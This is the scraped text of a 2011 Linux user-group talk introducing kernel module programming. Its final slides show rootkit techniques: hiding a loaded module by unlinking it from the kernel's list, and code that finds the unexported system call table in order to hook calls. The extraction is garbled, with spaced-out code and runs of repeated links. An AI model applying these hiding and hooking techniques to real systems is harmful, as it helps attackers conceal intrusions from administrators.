2011 01 19 kernel hacking
TRANSCRIPT
-
8/2/2019 2011 01 19 Kernel Hacking
1/28
Kernel HackingIntroduction to Linux Kernel 2.6
How to write a Rootkit
Maurice Leclaire
TumFUGLinux / Unixget-together
January 19, 2011
-
8/2/2019 2011 01 19 Kernel Hacking
2/28
Why hacking the kernel?
Understanding the Linux kernel
Fixing bugs
Adding special features
Writing drivers for special hardware
Writing rootkits
-
8/2/2019 2011 01 19 Kernel Hacking
3/28
How to hack the kernel?
Modifying the source code All modifications are possible Needs kernel recompile
Writing a LKM (Loadable Kernel Module) No kernel recompile Can be inserted into a running kernel No influence on boot process Restrictions due to the kernel
-
8/2/2019 2011 01 19 Kernel Hacking
4/28
How to get started?
Knowledge of the C Programming Language
Kernel source (e.g. kernel.org)
Compiler
Recommended:
Vanilla Kernel
Virtual machine for testing
Assembler knowledge
-
8/2/2019 2011 01 19 Kernel Hacking
5/28
How to get started?
http://lxr.linux.no
(complete source code cross reference)
http://people.netfilter.org/~rusty/unreliable-guides/
kernel-hacking/lk-hacking-guide.html(Rustys Kernel Hacking Guide)
http://www.faqs.org/docs/kernel
(LKM Programming Guide)
http://kernelnewbies.org/KernelHacking
http://lxr.linux.no/http://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://www.faqs.org/docs/kernelhttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://www.faqs.org/docs/kernelhttp://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.htmlhttp://lxr.linux.no/ -
8/2/2019 2011 01 19 Kernel Hacking
6/28
Coding StyleDocumentation/CodingStyle
First off, Id suggest printing out a copy of the GNU coding
standards, and NOT read it. Burn them, its a great symbolic
gesture.
8 chars indentation
only one statement on a single line
never use spaces for indentation
80 chars is max line length
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
7/28
printkinclude/linux/kernel.h
Kernel log function
used like userspace printf
p r i n t k (" H e l lo w o rl d ! \ n " );
p r i n t k ( K E R N _ I N F O " %s % i\ n ", m ys tr in g , m y in t ) ;
loglevel: KERN_DEBUG KERN_INFO KERN_NOTICE KERN_WARNING KERN_ERR KERN_CRIT KERN_ALERT KERN_EMERG
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
8/28
kmalloc/kfree vmalloc/vfreeinclude/linux/slab.h include/linux/vmalloc.h
kmalloc allocates kernel memory
up to 128 KB
void * m em = k ma ll oc ( s iz e , G FP _K E RN EL ) ;
k f r e e ( m e m ) ;
vmalloc can allocate more than 128 KB
virtual memory / non contiguous in RAM
void * m em = v ma ll oc ( s i ze ) ;
v f r e e ( m e m ) ;
kzalloc / vzalloc for zeroed memory
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
9/28
Kernel List Structureinclude/linux/list.h
double linked list
circular
type oblivious
list does not contain the items, the items contain the list
multiple lists in one item possible
1 s t r u c t m y_ st ru ct {
2 ...
3 struct l i st _ he a d l is t ;
4 ...5 struct l i st _ he a d a n o th e r _l i st ;
6 };
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
10/28
Kernel List Structureinclude/linux/list.h
1 s t r u c t l is t_ he ad * p , * q ;
2 s t r u c t m y_ st ru ct x , * p os ;
3
4 L I S T_ H EA D ( h e a d ) ;
5
6 l i st _ ad d ( & x . l is t , & h e ad ) ;
7
8 l is t_ fo r_ ea ch ( p, & h ea d ) {
9 pos = l i s t _ e n t r y (p , s t r u c t m y _ s t ru c t , l i s t ) ;
10 ...
11 }
12 /* i de nt ic al to */
13 l i st _ fo r _e a ch _ en t ry ( pos , & h ead , l is t ) { .. .}14
15 l is t_ fo r_ ea ch _s af e ( p, q , & h ea d ) {
16 l i s t _d e l ( p );
17 }
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
11/28
Communication with the Userspace
In Linux everything is a file
Communication is also done via files
For that purpose there are /proc, /sys and /dev files
They exist only in RAM
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
12/28
Creating a /dev fileinclude/linux/fs.h
1 s t at i c s t ru c t f i le _ op e ra t io n s f op s = {
2 . read = d evi ce _re ad ,
3 . writ e = d e vi ce _w ri te ,
4 . open = d evi ce _op en ,5 . r el e a s e = d e v i c e _ r e l e a s e
6 };
7
8 int m aj or = r e gi s te r _c h rd e v (0 , " m y d e v " , & f op s );
9 u n r eg i s te r _ c hr d e v ( m aj or , " m y d e v " ) ;
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
13/28
Reading/Writing files from Kernelspaceinclude/linux/fs.h include/asm/uaccess.h
You normally shouldnt do this
Use /proc, /sys or /dev files for communication with the userspace
1 s t r u c t f il e * f il e ;
2 f il e = f il p_ op en ( " / d i r / f i l e n a m e " , O_RDWR , 0) ;
3
4 if ( f il e && ! I S_ ER R ( fi le ) ) {
5 m m _ s e g m e n t _ t o ld _f s = g et _f s () ;
6 se t_ fs ( K E R N E L _ D S ) ;
7 lo ff _t f i l e _ s i z e = v f s _ l l s e e k ( file ,
( l o f f_ t ) 0 , S E EK _ EN D ) ;
8 char * b uf f = v ma ll oc ( f il e_ si ze ) ;
9 lo ff _t off = 0;10 v f s _ re a d (file , buff , file_size , & off ) ;
11 v f s _ w r i t e (file , buff , file_siz e , & off ) ;
12 v free ( buff ) ;
13 se t_ fs ( o ld _f s ) ;
14 }
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
14/28
Loadable Kernel Module
Object file that can be linked to the running kernel
Dynamically load and unload drivers how you need them lsmod lists the loaded modules
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
15/28
Hello World LKMhello world.c
1 # i n c l u d e < l i n u x / k e r n e l . h >
2 # i n c l u d e < l i n u x / m o d u l e . h >
3
4 int i n i t _ m o d u l e ( void )
5 {
6 pr in tk ( " T u mF UG : H el lo w or ld ! \ n " );7 return 0;
8 }
9
10 void c l e a n u p _ m o d u l e ( void )
11 {
12 pr in tk ( " T u m FU G : G o od b ye ! \ n " );13 }
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
16/28
Hello World LKMMakefile
1 obj - m += h e ll o_ w or l d . o
2
3 all :
4 make -C / lib /modules /$ ( shell uname -r ) / buildM = $ ( P WD ) m o du l es
5
6 c le an :
7 make -C / lib /modules /$ ( shell uname -r ) / build
M = $ ( P WD ) c l ea n
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
17/28
Hello World LKMCompiling and Loading
# m ak e
# i n sm o d h e l lo _ w or l d . k o
T um FU G : H el lo w or ld !
# r mm od h e ll o _w or l dT u mF U G : G o od b ye !
# d me sg | grep Tu mFU G
T um FU G : H el lo w or ld !
T u mF U G : G o od b ye !
# _
M d l D
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
18/28
Module Documentation
MODULE_LICENSE("GPL");
MODULE_AUTHOR("TumFUG");
MODULE_DESCRIPTION("Hello world module");
A module should contain these macros for documentation purposes
The license macro avoids a warning message when loaded
U C
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
19/28
Use Counter
Prevents the module from being unloaded when used
1 void o p e n ( void )
2 {
3 t r y _ m o d u l e _ g e t ( TH I S _ M O D U L E );
4 ...
5 }
6
7 void c l o s e ( void )
8 {
9 ...
10 p u t _ m o d u l e ( T H I S _ M O D U L E );11 }
R ki
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
20/28
RootkitsLKM-based Rootkits
Software that lives in kernel space
Hides itself from the sysadmin
Enables privileged access to the system for non-privileged users Is typically installed by an attacker after he broke into a system
Hides all the attackers actions
Keylogger
Hidi th M d l
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
21/28
Hiding the Module
The kernel holds a list of all modules
Removing the module from this list is enough to hide
l i s t _ d e l ( & T H I S _ M O D U L E - > l i s t ) ;
Hiding processes is similar
task structure is more complex
More lists to remove from
S t C ll
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
22/28
System Calls
requests to the kernel
interface between userspace and kernelspace
Program
...read()
...
idt
...
0x80 sys call
...
sys call handler
...
sys call table
...
2 sys fork
3 sys read
4 sys write
...
sys read
...
S ste Call Hooki g
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
23/28
System Call Hooking
Change pointer to a system call handler
The hook function is executed instead of the original one
Program
...read()
...
idt
...
0x80 sys call
...
sys call handler
...
sys call table
...2 sys fork
3 hook read
4 sys write
...
sys read
...
hook read
...
get control over the kernels behaviour
Problem: since 2.6 the address of the sys call table is no longerexported
Solution: Find it yourself
Finding the sys call table
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
24/28
Finding the sys call table
Get the idt address with sidt
Get the address of the sys_call_handler from the idt entry 0x80
Interpret the machine code of the sys_call_handler that includesthe address of the sys_call_table
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
25/28
1 s t r u c t dt {
2 u16 li mit ;
3 u32 base ;
4 } _ _ a tt r i bu t e __ ( ( _ _ p ac k ed _ _ ) ) ;
56 s t r u c t i dt _e nt ry {
7 u16 o f f s e t _ l o w ;
8 u16 s e l ec t o r ;
9 u8 zero ;
10 u8 attr ;
11 u16 o f f s e t _ h i g h ;12 } _ _ a tt r i bu t e __ ( ( _ _ p ac k ed _ _ ) ) ;
13
14 s t r u c t g dt _e nt ry {
15 u16 l i m i t _ l o w ;
16 u16 b a s e_ l o w ;
17 u8 b as e _ m i d ;18 u8 a cc es s ;
19 u8 atrr ;
20 u8 b a s e _ h i g h ;
21 } _ _ a tt r i bu t e __ ( ( _ _ p ac k ed _ _ ) ) ;
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
26/28
22 void * * s y s _ c a l l _ t a b l e ;
23
24 s t r u c t dt gdt ;
25 _ _ a s m_ _ ( " s gd t % 0\ n " : " = m " ( g d t ) ) ;
2627 s t r u c t dt idt ;
28 _ _ a s m_ _ ( " s id t % 0\ n " : " = m " ( i d t ) ) ;
29
30 s t r u c t i d t_ e nt r y * i d t _ en t r y
31 = ( s t r u c t i d t_ e n tr y * )( i d t . b a se ) ;
32 i dt _ en tr y += 0 x 80 ; /* 0 x 80 : l in ux s ys ca ll */
33 u 32 s y s ca l l _o f f se t = ( i d t_ e nt ry - > o f f s e t_ h i gh < < 1 6)
34 | idt_e ntry - > o f f s e t _ l o w ;
35
36 s t r u c t g d t_ e nt r y * g d t _ en t r y
37 = ( s t r u c t g d t_ e n tr y * )( g d t . b a se ) ;
38 g d t _ e n tr y + = i d t_ e n tr y - > s e l e c t o r ;
39 u 32 s y sc a ll _ ba s e = ( g dt _e nt ry - > b a se _h ig h < < 2 4)
40 | ( gdt_entry - > b a s e _m i d b a s e _l o w ;
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
27/28
42 u 8 * s y s t e m_ c a ll
43 = ( u8 *)( sy s c a l l _ b a s e + s y s c a l l _ o f f s e t );
44
45 /* s ea rc h c al l to s ys _c al l_ ta bl e */
46 /* FF 14 85 off4 : jmp off4 ( ,% eax ,4) */
47 while48 ( (* ( u 32 * )( s ys t em _ ca ll + +) & 0 x F FF FF F ) != 0 x 8 51 4F F ) ;
49
50 s y s_ c al l _t ab l e = * ( void * ** )( s ys t em _c a ll + 2 );
A simple Keylogger
